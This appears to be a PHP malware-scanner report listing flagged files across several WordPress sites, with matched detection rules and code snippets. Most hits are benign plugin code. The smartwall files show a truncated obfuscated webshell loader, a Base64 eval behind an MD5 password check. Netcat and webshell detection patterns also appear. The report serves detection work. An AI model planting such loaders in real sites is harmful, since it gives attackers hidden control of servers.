$p_options[PCLZIP_CB_PRE_EXTRACT](PCLZIP_CB_PRE_EXTRACT, $v_local_header)
| Exploit nano Line: 3579 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_EXTRACT](PCLZIP_CB_POST_EXTRACT, $v_local_header)
| Sign 963e968a Line: 5166 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//var/www/intim-ekaterinburg.ru/data/www/intim-ekaterinburg66.ru/wp-content/plugins/wp-all-import-pro/actions/wp_ajax_import_failed.php Size: 799.00 B Created: 2020-02-13 15:50:39 Modified: 2020-07-24 20:05:17 Dangers: 1
| Description | Match |
|---|
Exploit extract_global Line: 12 Dangerous Code injection: extracting global variable arrays allows remote attackers to inject PHP code on the target machine via an HTTP request |
extract($_POST)
|
|
//var/www/intim-ekaterinburg.ru/data/www/intim-ekaterinburg66.ru/wp-content/plugins/ajax-search-pro/includes/classes/ajax/class-asp-search.php Size: 5.79 kB Created: 2021-03-14 17:38:57 Modified: 2021-03-14 17:38:57 Dangers: 1
|
//var/www/intim-ekaterinburg.ru/data/www/intim-ekaterinburg66.ru/wp-content/plugins/ajax-search-pro/includes/classes/core/class-asp-init.php Size: 28.14 kB Created: 2021-03-14 17:38:52 Modified: 2021-03-14 17:38:52 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 383 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/intim-ekaterinburg.ru/data/www/intim-ekaterinburg66.ru/wp-content/plugins/ajax-search-pro/includes/classes/etc/class-asp_helpers.php Size: 82.97 kB Created: 2021-03-14 17:38:54 Modified: 2021-03-14 17:38:54 Dangers: 1
|
//var/www/intim-ekaterinburg.ru/data/www/intim-ekaterinburg66.ru/wp-content/plugins/ajax-search-pro/includes/externals/pdf-smalot/tecnickcom/tcpdf/include/tcpdf_colors.php Size: 14.36 kB Created: 2021-03-14 17:39:08 Modified: 2021-03-14 17:39:08 Dangers: 1
|
//var/www/intim-ekaterinburg.ru/data/www/intim-ekaterinburg66.ru/wp-content/plugins/ajax-search-pro/includes/externals/pdf-smalot/tecnickcom/tcpdf/tcpdf_barcodes_1d.php Size: 71.69 kB Created: 2021-03-14 17:39:08 Modified: 2021-03-14 17:39:08 Warns: 3
| Description | Match |
|---|
Exploit too_many_chr Line: 1071 Warning Concatenation of `chr` technique is usually used for the obfuscation of malicious code |
chr(0).chr(1).chr(2).chr(3).chr(4).chr(5).chr(6).chr(7).
| Exploit too_many_chr Line: 1072 Warning Concatenation of `chr` technique is usually used for the obfuscation of malicious code |
chr(10).chr(11).chr(12).chr(13).chr(14).chr(15).chr(16).chr(17).
| Exploit too_many_chr Line: 1073 Warning Concatenation of `chr` technique is usually used for the obfuscation of malicious code |
chr(20).chr(21).chr(22).chr(23).chr(24).chr(25).chr(26).chr(27).
|
|
//var/www/intim-ekaterinburg.ru/data/www/intim-ekaterinburg66.ru/wp-content/plugins/ajax-search-pro/backend/search.php Size: 21.91 kB Created: 2020-01-13 17:39:14 Modified: 2020-07-24 20:05:17 Dangers: 1
|
//var/www/intim-ekaterinburg.ru/data/www/intim-ekaterinburg66.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_taxonomy_term_select.class.php Size: 25.39 kB Created: 2020-01-13 17:39:14 Modified: 2020-07-24 20:05:17 Dangers: 1
|
//var/www/intim-ekaterinburg.ru/data/www/intim-ekaterinburg66.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_cf_search_callback.class.php Size: 6.03 kB Created: 2020-01-13 17:39:14 Modified: 2020-07-24 20:05:17 Dangers: 1
|
//var/www/intim-ekaterinburg.ru/data/www/intim-ekaterinburg66.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_user_select.class.php Size: 8.51 kB Created: 2020-01-13 17:39:14 Modified: 2020-07-24 20:05:17 Dangers: 1
|
//var/www/intim-ekaterinburg.ru/data/www/intim-ekaterinburg66.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_taxterm_search_callback.class.php Size: 5.94 kB Created: 2020-01-13 17:39:14 Modified: 2020-07-24 20:05:17 Dangers: 1
|
//var/www/intim-ekaterinburg.ru/data/www/intim-ekaterinburg66.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/type.class.php Size: 5.81 kB Created: 2020-01-13 17:39:14 Modified: 2020-07-24 20:05:17 Dangers: 1
| Description | Match |
|---|
Exploit nano Line: 98 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$val['func']($this->newData)
|
|
//var/www/intim-ekaterinburg.ru/data/www/intim-ekaterinburg66.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_cpt_select.class.php Size: 7.36 kB Created: 2020-01-13 17:39:14 Modified: 2020-07-24 20:05:17 Dangers: 1
|
//var/www/intim-ekaterinburg.ru/data/www/intim-ekaterinburg66.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/languageselect.class.php Size: 6.91 kB Created: 2020-01-13 17:39:14 Modified: 2020-07-24 20:05:17 Dangers: 1
| Description | Match |
|---|
Function str_rot13 eval_str_rot13 Line: 177 Dangerous Encoded Function `eval` [https://www.php.net/eval] |
riny
|
|
//var/www/intim-ekaterinburg.ru/data/www/intim-ekaterinburg66.ru/script_smartwall/update.php Size: 9.06 kB Created: 2020-09-27 14:56:12 Modified: 2020-09-27 14:56:23 Warns: 1 Dangers: 1
| Description | Match |
|---|
Exploit password_protection_md5 Line: 9 Warning MD5 Password protection file, typically used on web shells |
md5($_REQUEST["password"])=="4416e04b9d6b6cfa37fe07a21359c030"
| Sign 8f25a7cb Line: 9 Dangerous Malware Signature (hash: 8f25a7cb) |
if(md5($_REQUEST[
|
|
//var/www/intim-ekaterinburg.ru/data/www/intim-ekaterinburg66.ru/script_smartwall/index.php Size: 38.45 kB Created: 2020-09-27 14:56:13 Modified: 2020-09-27 14:56:23 Warns: 1 Dangers: 1
| Description | Match |
|---|
Exploit password_protection_md5 Line: 19 Warning MD5 Password protection file, typically used on web shells |
md5($_REQUEST["password"])=="4416e04b9d6b6cfa37fe07a21359c030"
| Sign 8f25a7cb Line: 19 Dangerous Malware Signature (hash: 8f25a7cb) |
if(md5($_REQUEST[
|
|
//var/www/intim-ekaterinburg.ru/data/www/intim-ekaterinburg66.ru/script_smartwall/smartwall.php Size: 8.87 kB Created: 2020-09-27 14:56:13 Modified: 2020-09-27 14:56:22 Warns: 2 Dangers: 3
| Description | Match |
|---|
Exploit base64_long Line: 2 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
'bZrXCsVacqZfpWkaTjcCKyfax43CVs5pS7oZlHPOMn537xn7cq6EAlKtWlV/fT/o3/811/NfymPM9mYa/5JHfRUU7uQ4Vpa+DrOW7Pv3v803/86BVlzuP/7zb+ufabIVBPZ/8iKb8uLvf43ReU6HeItCp1dFpc4QHzEEuou/xhmL/qRILOZI8xV0d5/D+qzaf/7513/8cy32Yx3/UpxJ//e//u/J39Z//u781/9c/ONf//HHv/1/A/ojjdeQ27wt94Pydlo+fUy52Iy7lZZzQjHPWVFUOrVjiD0t1DGdV4AuA+OCA90TxN8V8MFe/8akjsFg15Lpw/TAxgcvLS8uzJQkkBegpMDbuqPaY6EleOgn8YIuCUc2ooGj46X9HYDgqPLvyJCK0OXHCvXL6H6AaJqhHvOGwW+BWV9ZoJYuHDtN8lMQ8Ybi9wsCoFaAKxUAq2mWzWmlIBhaIFjWGnCWJQlSOEgDQJaBIIBYJdiDPGhLRCa83gK...
| Function eval Line: 2 Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval("return $r;");} eval('?>'.ETOHERlTjcnxEbfSJHvr('bZrXCsVacqZfpWkaTjcCKyfax43CVs5pS7oZlHPOMn537xn7cq6EAlKtWlV/fT/o3/811/NfymPM9mYa/5JHfRUU7uQ4Vpa+DrOW7Pv3v803/86BVlzuP/7zb+ufabIVBPZ/8iKb8uLvf43ReU6HeItCp1dFpc4QHzEEuou/xhmL/qRILOZI8xV0d5/D+qzaf/7513/8cy32Yx3/UpxJ//e//u/J39Z//u781/9c/ONf//HHv/1/A/ojjdeQ27wt94Pydlo+fUy52Iy7lZZzQjHPWVFUOrVjiD0t1DGdV4AuA+OCA90TxN8V8MFe/8akjsFg15Lpw/TAxgcvLS8uzJQkkBegpMDbuqPaY6EleOgn8YIuCUc2ooGj46X9HYDgqPLvyJCK0OXHCvXL6H6AaJqhHvOGwW+BWV9ZoJYuHDtN8lMQ8Ybi9wsCoFaAKxU...
| Sign 11413268 Line: 2 Dangerous Malware Signature (hash: 11413268) |
eval('?>
| Sign 7f5d33bf Line: 2 Dangerous Malware Signature (hash: 7f5d33bf) |
Jhc2U2N
| Sign d97f004d Line: 2 Dangerous Malware Signature (hash: d97f004d) |
Z3ppbmZsYXRl
|
|
//var/www/intimkrasnodara/data/www/intimkrasnodara.ru/wp-content/plugins/profile-builder-pro/modules/user-listing/userlisting.php Size: 128.34 kB Created: 2020-04-30 18:03:08 Modified: 2020-07-24 20:10:44 Warns: 1
| Description | Match |
|---|
Exploit double_var2 Line: 1185 Warning Double var technique is usually used for the obfuscation of malicious code |
${$gloabl_filter_ids_name}
|
|
//var/www/intimkrasnodara/data/www/intimkrasnodara.ru/wp-content/plugins/wordpress-seo-premium/premium/classes/redirect/redirect-validator.php Size: 4.64 kB Created: 2020-04-30 18:03:09 Modified: 2020-07-24 20:10:44 Dangers: 1
| Description | Match |
|---|
Exploit nano Line: 140 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$validation_rule['validation_class']()
|
|
//var/www/intimkrasnodara/data/www/intimkrasnodara.ru/wp-content/plugins/wp-asset-clean-up-pro/classes/OwnAssets.php Size: 44.62 kB Created: 2021-05-16 21:14:21 Modified: 2021-05-16 21:14:21 Warns: 1
| Description | Match |
|---|
Function system Warning Potentially dangerous function `system` [https://www.php.net/system] |
system (e.g. you are using the website for business purposes, to showcase your products and you are not using it as a blog where people leave comments to your posts).', 'wp-asset-clean-up')."\n\n". __('If you are not sure about whether activating this option is right or not, it is better to leave it as it is (to be loaded by default).', 'wp-asset-clean-up')."\n\n". __('Confirm this action to enable the unloading or cancel to leave it loaded by default.', 'wp-asset-clean-up'); $wpacuObjectData['r...
|
|
//var/www/intimkrasnodara/data/www/intimkrasnodara.ru/wp-content/plugins/wp-asset-clean-up-pro/classes/OptimiseAssets/FontsGoogle.php Size: 23.64 kB Created: 2021-05-16 21:14:21 Modified: 2021-05-16 21:14:21 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 656 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/intimkrasnodara/data/www/intimkrasnodara.ru/wp-content/plugins/wp-asset-clean-up-pro/classes/OptimiseAssets/MinifyJs.php Size: 10.11 kB Created: 2021-05-16 21:14:21 Modified: 2021-05-16 21:14:21 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 137 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/intimkrasnodara/data/www/intimkrasnodara.ru/wp-content/plugins/wp-asset-clean-up-pro/classes/Tools.php Size: 32.60 kB Created: 2021-05-16 21:14:21 Modified: 2021-05-16 21:14:21 Dangers: 1
| Description | Match |
|---|
Sign 471b95ee Line: 328 Dangerous Malware Signature (hash: 471b95ee) |
suhosin
|
|
//var/www/intimkrasnodara/data/www/intimkrasnodara.ru/wp-content/plugins/wp-asset-clean-up-pro/pro/classes/OptimiseAssets/OptimizeJsPro.php Size: 8.80 kB Created: 2021-05-16 21:14:21 Modified: 2021-05-16 21:14:21 Dangers: 2
| Description | Match |
|---|
Exploit execution2 Dangerous RCE (Remote Code Execution): allows remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
array_filter($allPatterns); } public static function isInlineJsEnabled() { $isEnabledInSettingsWithListOrAuto = (Main::instance()->settings['inline_js_files'] && (trim(Main::instance()->settings['inline_js_files_list']) !== '' || self::isAutoInlineEnabled())); if (! $isEnabledInSettingsWithListOrAuto) { return false; } if (array_key_exists('wpacu_no_inline_js', $_GET)
| Exploit execution2 Line: 36 Dangerous RCE (Remote Code Execution): allows remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
array_filter($allPatterns); }
/** * @return bool */ public static function isInlineJsEnabled() { $isEnabledInSettingsWithListOrAuto = (Main::instance()->settings['inline_js_files'] && (trim(Main::instance()->settings['inline_js_files_list']) !== '' || self::isAutoInlineEnabled()));
if (! $isEnabledInSettingsWithListOrAuto) { return false; }
// Deactivate it for debugging purposes via query string /?wpacu_no_inline_js if (array_key_e...
|
|
//var/www/intimkrasnodara/data/www/intimkrasnodara.ru/wp-content/plugins/wp-asset-clean-up-pro/templates/_admin-page-settings-plugin-areas/_fonts-google/_optimize-area.php Size: 13.93 kB Created: 2021-05-16 21:14:21 Modified: 2021-05-16 21:14:21 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 71 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/intimkrasnodara/data/www/intimkrasnodara.ru/wp-content/plugins/wp-asset-clean-up-pro/vendor/rawr/t-regx/src/SafeRegex/preg.php Size: 3.43 kB Created: 2021-05-16 21:14:21 Modified: 2021-05-16 21:14:21 Dangers: 1
| Description | Match |
|---|
Sign 696317c4 Line: 27 Dangerous Malware Signature (hash: 696317c4) |
@preg_replace
|
|
//var/www/intimkrasnodara/data/www/intimkrasnodara.ru/wp-content/plugins/wp-asset-clean-up-pro/vendor/matthiasmullie/minify/src/JS.php Size: 38.32 kB Created: 2021-05-16 21:14:21 Modified: 2021-05-16 21:14:21 Warns: 1
| Description | Match |
|---|
Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] |
exec(', 'test(', 'toSource(', 'toString(', ); $delimiters = array_fill(0, count($propertiesAndMethods), '/'); $propertiesAndMethods = array_map('preg_quote', $propertiesAndMethods, $delimiters); $after = '(?=\s*([\.,;\)\}&\|+]|\/\/|$|\.('.implode('|', $propertiesAndMethods).')))'; $this->registerPattern('/'.$before.'\K'.$pattern.$after.'/', $callback); $before = '\)\s*'; $after = '(?=\s*\.('.implode('|', $propertiesAndMethods).'))'; $this->registerPattern('/'.$before.'\K'.$pattern.$after.'/', $c...
|
|
//var/www/intimkrasnodara/data/www/intimkrasnodara.ru/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Helper/HTML.php Size: 24.21 kB Created: 2020-04-30 18:03:09 Modified: 2020-07-24 20:10:44 Dangers: 1
|
//var/www/intimkrasnodara/data/www/intimkrasnodara.ru/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Reader/Excel5.php Size: 285.78 kB Created: 2020-04-30 18:03:09 Modified: 2020-07-24 20:10:44 Dangers: 1
| Description | Match |
|---|
Exploit hacked_by Line: 7576 Dangerous Hacker credits |
Hacked by
|
|
//var/www/intimkrasnodara/data/www/intimkrasnodara.ru/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/File.php Size: 5.87 kB Created: 2020-04-30 18:03:09 Modified: 2020-07-24 20:10:44 Dangers: 1
| Description | Match |
|---|
Sign 471b95ee Line: 176 Dangerous Malware Signature (hash: 471b95ee) |
Suhosin
|
|
//var/www/intimkrasnodara/data/www/intimkrasnodara.ru/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/PCLZip/pclzip.lib.php Size: 209.23 kB Created: 2020-04-30 18:03:09 Modified: 2020-07-24 20:10:44 Dangers: 5
| Description | Match |
|---|
Exploit nano Line: 2454 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_ADD](PCLZIP_CB_PRE_ADD, $v_local_header)
| Exploit nano Line: 2588 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_ADD](PCLZIP_CB_POST_ADD, $v_local_header)
| Exploit nano Line: 3386 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_EXTRACT](PCLZIP_CB_PRE_EXTRACT, $v_local_header)
| Exploit nano Line: 3575 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_EXTRACT](PCLZIP_CB_POST_EXTRACT, $v_local_header)
| Sign 963e968a Line: 5162 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//var/www/intimkrasnodara/data/www/intimkrasnodara.ru/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/OLERead.php Size: 10.98 kB Created: 2020-04-30 18:03:09 Modified: 2020-07-24 20:10:44 Dangers: 1
| Description | Match |
|---|
Exploit hacked_by Line: 308 Dangerous Hacker credits |
Hacked by
|
|
//var/www/intimkrasnodara/data/www/intimkrasnodara.ru/wp-content/plugins/wp-all-import-pro/helpers/functions.php Size: 8.30 kB Created: 2020-04-30 18:03:09 Modified: 2020-07-24 20:10:44 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval ("return ($str);")) ? $then : $else; } } if ( ! function_exists('is_empty') ) { function is_empty( $var ) { return empty($var); } } if ( ! function_exists('pmxi_human_filesize') ) { function pmxi_human_filesize($bytes, $decimals = 2) { $sz = 'BKMGTP'; $factor = (int) floor((strlen($bytes) - 1) / 3); return sprintf("%.{$decimals}f", $bytes / pow(1024, $factor)) . (isset($sz[$factor]) ? $sz[$factor] : ''); } } if ( ! function_exists('pmxi_get_remote_image_ext') ) { function pmxi_get_remote_im...
|
|
//var/www/intimkrasnodara/data/www/intimkrasnodara.ru/wp-content/plugins/wp-all-import-pro/libraries/pclzip.lib.php Size: 185.99 kB Created: 2020-04-30 18:03:09 Modified: 2020-07-24 20:10:44 Dangers: 5
| Description | Match |
|---|
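Exploit nano Line: 2458 Dangerous Nano is a family of PHP webshells that are code-golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] (the match below is a variable-function call to a PclZip callback option, so compare the file with the upstream library before treating it as a webshell) |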
$p_options[PCLZIP_CB_PRE_ADD](PCLZIP_CB_PRE_ADD, $v_local_header)
| Exploit nano Line: 2592 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_ADD](PCLZIP_CB_POST_ADD, $v_local_header)
| Exploit nano Line: 3390 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_EXTRACT](PCLZIP_CB_PRE_EXTRACT, $v_local_header)
| Exploit nano Line: 3579 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_EXTRACT](PCLZIP_CB_POST_EXTRACT, $v_local_header)
| Sign 963e968a Line: 5166 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//var/www/intimkrasnodara/data/www/intimkrasnodara.ru/wp-content/plugins/wp-all-import-pro/actions/wp_ajax_import_failed.php Size: 799.00 B Created: 2020-04-30 18:03:09 Modified: 2020-07-24 20:10:44 Dangers: 1
| Description | Match |
|---|
Exploit extract_global Line: 12 Dangerous Code injection: extracting global variable arrays allows remote attackers to inject PHP code on the target machine via an HTTP request |
extract($_POST)
|
|
//var/www/intimkrasnodara/data/www/intimkrasnodara.ru/wp-content/plugins/ajax-search-pro/includes/classes/ajax/class-asp-search.php Size: 5.79 kB Created: 2020-04-30 18:03:09 Modified: 2020-07-24 20:10:44 Dangers: 1
|
//var/www/intimkrasnodara/data/www/intimkrasnodara.ru/wp-content/plugins/ajax-search-pro/includes/classes/core/class-asp-init.php Size: 28.14 kB Created: 2020-04-30 18:03:09 Modified: 2020-07-24 20:10:44 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 383 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/intimkrasnodara/data/www/intimkrasnodara.ru/wp-content/plugins/ajax-search-pro/includes/classes/etc/class-asp_helpers.php Size: 82.97 kB Created: 2020-04-30 18:03:09 Modified: 2020-07-24 20:10:44 Dangers: 1
|
//var/www/intimkrasnodara/data/www/intimkrasnodara.ru/wp-content/plugins/ajax-search-pro/includes/externals/pdf-smalot/tecnickcom/tcpdf/include/tcpdf_colors.php Size: 14.36 kB Created: 2020-04-30 18:03:09 Modified: 2020-07-24 20:10:44 Dangers: 1
|
//var/www/intimkrasnodara/data/www/intimkrasnodara.ru/wp-content/plugins/ajax-search-pro/includes/externals/pdf-smalot/tecnickcom/tcpdf/tcpdf_barcodes_1d.php Size: 71.69 kB Created: 2020-04-30 18:03:09 Modified: 2020-07-24 20:10:44 Warns: 3
| Description | Match |
|---|
Exploit too_many_chr Line: 1071 Warning Concatenating many `chr` calls is a technique usually used to obfuscate malicious code (the three matches in this file are runs of consecutive character codes, which looks like a lookup table rather than an encoded payload; confirm against the upstream TCPDF file) |
chr(0).chr(1).chr(2).chr(3).chr(4).chr(5).chr(6).chr(7).
| Exploit too_many_chr Line: 1072 Warning Concatenating many `chr` calls is a technique usually used to obfuscate malicious code |
chr(10).chr(11).chr(12).chr(13).chr(14).chr(15).chr(16).chr(17).
| Exploit too_many_chr Line: 1073 Warning Concatenating many `chr` calls is a technique usually used to obfuscate malicious code |
chr(20).chr(21).chr(22).chr(23).chr(24).chr(25).chr(26).chr(27).
|
|
//var/www/intimkrasnodara/data/www/intimkrasnodara.ru/wp-content/plugins/ajax-search-pro/backend/search.php Size: 21.91 kB Created: 2020-04-30 18:03:09 Modified: 2020-07-24 20:10:44 Dangers: 1
|
//var/www/intimkrasnodara/data/www/intimkrasnodara.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_taxonomy_term_select.class.php Size: 25.39 kB Created: 2020-04-30 18:03:09 Modified: 2020-07-24 20:10:44 Dangers: 1
|
//var/www/intimkrasnodara/data/www/intimkrasnodara.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_cf_search_callback.class.php Size: 6.03 kB Created: 2020-04-30 18:03:09 Modified: 2020-07-24 20:10:44 Dangers: 1
|
//var/www/intimkrasnodara/data/www/intimkrasnodara.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_user_select.class.php Size: 8.51 kB Created: 2020-04-30 18:03:09 Modified: 2020-07-24 20:10:44 Dangers: 1
|
//var/www/intimkrasnodara/data/www/intimkrasnodara.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_taxterm_search_callback.class.php Size: 5.94 kB Created: 2020-04-30 18:03:09 Modified: 2020-07-24 20:10:44 Dangers: 1
|
//var/www/intimkrasnodara/data/www/intimkrasnodara.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/type.class.php Size: 5.81 kB Created: 2020-04-30 18:03:09 Modified: 2020-07-24 20:10:44 Dangers: 1
| Description | Match |
|---|
Exploit nano Line: 98 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$val['func']($this->newData)
|
|
//var/www/intimkrasnodara/data/www/intimkrasnodara.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_cpt_select.class.php Size: 7.36 kB Created: 2020-04-30 18:03:09 Modified: 2020-07-24 20:10:44 Dangers: 1
|
//var/www/intimkrasnodara/data/www/intimkrasnodara.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/languageselect.class.php Size: 6.91 kB Created: 2020-04-30 18:03:09 Modified: 2020-07-24 20:10:44 Dangers: 1
| Description | Match |
|---|
Function str_rot13 eval_str_rot13 Line: 177 Dangerous Encoded Function `eval` [https://www.php.net/eval] |
riny
|
|
//var/www/intimkrasnodara/data/www/intimkrasnodara.ru/script_smartwall/update.php Size: 9.06 kB Created: 2020-09-29 18:17:46 Modified: 2020-09-29 18:18:07 Warns: 1 Dangers: 1
| Description | Match |
|---|
Exploit password_protection_md5 Line: 9 Warning File gated by an MD5 password check, a pattern typically used on web shells |
md5($_REQUEST["password"])=="4416e04b9d6b6cfa37fe07a21359c030"
| Sign 8f25a7cb Line: 9 Dangerous Malware Signature (hash: 8f25a7cb) |
if(md5($_REQUEST[
|
|
//var/www/intimkrasnodara/data/www/intimkrasnodara.ru/script_smartwall/index.php Size: 38.45 kB Created: 2020-09-29 18:17:46 Modified: 2020-09-29 18:18:07 Warns: 1 Dangers: 1
| Description | Match |
|---|
Exploit password_protection_md5 Line: 19 Warning MD5 Password protection file, typically used on web shells |
md5($_REQUEST["password"])=="4416e04b9d6b6cfa37fe07a21359c030"
| Sign 8f25a7cb Line: 19 Dangerous Malware Signature (hash: 8f25a7cb) |
if(md5($_REQUEST[
|
|
//var/www/intimkrasnodara/data/www/intimkrasnodara.ru/script_smartwall/smartwall.php Size: 8.87 kB Created: 2020-09-29 18:17:46 Modified: 2020-09-29 18:18:06 Warns: 2 Dangers: 3
| Description | Match |
|---|
Exploit base64_long Line: 2 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
'bZrXCsVacqZfpWkaTjcCKyfax43CVs5pS7oZlHPOMn537xn7cq6EAlKtWlV/fT/o3/811/NfymPM9mYa/5JHfRUU7uQ4Vpa+DrOW7Pv3v803/86BVlzuP/7zb+ufabIVBPZ/8iKb8uLvf43ReU6HeItCp1dFpc4QHzEEuou/xhmL/qRILOZI8xV0d5/D+qzaf/7513/8cy32Yx3/UpxJ//e//u/J39Z//u781/9c/ONf//HHv/1/A/ojjdeQ27wt94Pydlo+fUy52Iy7lZZzQjHPWVFUOrVjiD0t1DGdV4AuA+OCA90TxN8V8MFe/8akjsFg15Lpw/TAxgcvLS8uzJQkkBegpMDbuqPaY6EleOgn8YIuCUc2ooGj46X9HYDgqPLvyJCK0OXHCvXL6H6AaJqhHvOGwW+BWV9ZoJYuHDtN8lMQ8Ybi9wsCoFaAKxUAq2mWzWmlIBhaIFjWGnCWJQlSOEgDQJaBIIBYJdiDPGhLRCa83gK...
| Function eval Line: 2 Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval("return $r;");} eval('?>'.ETOHERlTjcnxEbfSJHvr('bZrXCsVacqZfpWkaTjcCKyfax43CVs5pS7oZlHPOMn537xn7cq6EAlKtWlV/fT/o3/811/NfymPM9mYa/5JHfRUU7uQ4Vpa+DrOW7Pv3v803/86BVlzuP/7zb+ufabIVBPZ/8iKb8uLvf43ReU6HeItCp1dFpc4QHzEEuou/xhmL/qRILOZI8xV0d5/D+qzaf/7513/8cy32Yx3/UpxJ//e//u/J39Z//u781/9c/ONf//HHv/1/A/ojjdeQ27wt94Pydlo+fUy52Iy7lZZzQjHPWVFUOrVjiD0t1DGdV4AuA+OCA90TxN8V8MFe/8akjsFg15Lpw/TAxgcvLS8uzJQkkBegpMDbuqPaY6EleOgn8YIuCUc2ooGj46X9HYDgqPLvyJCK0OXHCvXL6H6AaJqhHvOGwW+BWV9ZoJYuHDtN8lMQ8Ybi9wsCoFaAKxU...
| Sign 11413268 Line: 2 Dangerous Malware Signature (hash: 11413268) |
eval('?>
| Sign 7f5d33bf Line: 2 Dangerous Malware Signature (hash: 7f5d33bf) |
Jhc2U2N
| Sign d97f004d Line: 2 Dangerous Malware Signature (hash: d97f004d); the matched string is the Base64 encoding of `gzinflate` |
Z3ppbmZsYXRl
|
|
//var/www/volgograd/data/www/intim-volgograd.info/wp-content/plugins/profile-builder-pro/modules/user-listing/userlisting.php Size: 128.34 kB Created: 2020-03-07 14:01:48 Modified: 2020-07-24 20:09:15 Warns: 1
| Description | Match |
|---|
Exploit double_var2 Line: 1185 Warning Double var technique is usually used for the obfuscation of malicious code |
${$gloabl_filter_ids_name}
|
|
//var/www/volgograd/data/www/intim-volgograd.info/wp-content/plugins/wordpress-seo-premium/premium/classes/redirect/redirect-validator.php Size: 4.64 kB Created: 2020-01-13 17:39:51 Modified: 2020-07-24 20:09:15 Dangers: 1
| Description | Match |
|---|
Exploit nano Line: 140 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$validation_rule['validation_class']()
|
|
//var/www/volgograd/data/www/intim-volgograd.info/wp-content/plugins/profile-builder/assets/lib/Mustache/Engine.php Size: 22.10 kB Created: 2020-03-07 13:59:53 Modified: 2020-07-24 20:09:15 Warns: 1 Dangers: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval('?>'.$this->compile($source)); } } $this->log( Mustache_Logger::DEBUG, 'Instantiating template: "{className}"', array('className' => $className) ); $this->templates[$className] = new $className($this); } return $this->templates[$className]; } private function tokenize($source) { return $this->getTokenizer()->scan($source); } private function parse($source) { return $this->getParser()->parse($this->tokenize($source)); } private function compile($source) { $tree = $this->parse($source); $name...
| Sign 11413268 Line: 602 Dangerous Malware Signature (hash: 11413268) |
eval('?>
|
|
//var/www/volgograd/data/www/intim-volgograd.info/wp-content/plugins/profile-builder/assets/lib/wck-api/wordpress-creation-kit.php Size: 60.54 kB Created: 2020-03-07 13:59:53 Modified: 2020-07-24 20:09:15 Dangers: 2
|
//var/www/volgograd/data/www/intim-volgograd.info/wp-content/plugins/wp-asset-clean-up-pro/classes/OwnAssets.php Size: 44.62 kB Created: 2021-05-16 21:14:46 Modified: 2021-05-16 21:14:46 Warns: 1
| Description | Match |
|---|
